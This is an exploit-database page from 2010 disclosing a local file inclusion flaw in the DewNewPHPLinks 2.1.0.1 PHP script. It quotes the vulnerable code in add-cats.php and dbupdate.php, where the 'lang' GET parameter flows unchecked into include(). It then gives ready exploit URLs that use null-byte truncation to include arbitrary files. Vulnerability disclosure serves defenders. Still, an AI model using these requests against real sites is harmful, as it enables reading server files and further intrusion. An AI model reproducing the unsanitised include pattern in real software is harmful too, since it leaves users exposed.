DewNewPHPLinks 2.1.0.1 LFI



EDB-ID: 11795 CVE: N/A OSVDB-ID: N/A
Author: ItSecTeam Published: 2010-03-18 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next 
#########################local file include#################
Author: ItSecTeam

download from:http://www.dew-code.com/components/com_jooget/file/dew-newphplinks.v.2.1.0.1b.sef.zip

script:DewNewPHPLinks 2.1.0.1

*********************lfi*******************
vul1:/path/docs/add-cats.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");
----------
vul2:/path/docs/dbupdate.php
$lang=$_GET['lang'];
if($lang!='')
include ("../include/lang/$lang.php");

--------------------------------------------

xpl lfi:/path/docs/add-cats.php?lang=[lfi]%00
xpl lfi:/path/docs/dbupdate.php?lang=[lfi]%00
########################

discovered by ahmadbady

########################






Comments

No comments so far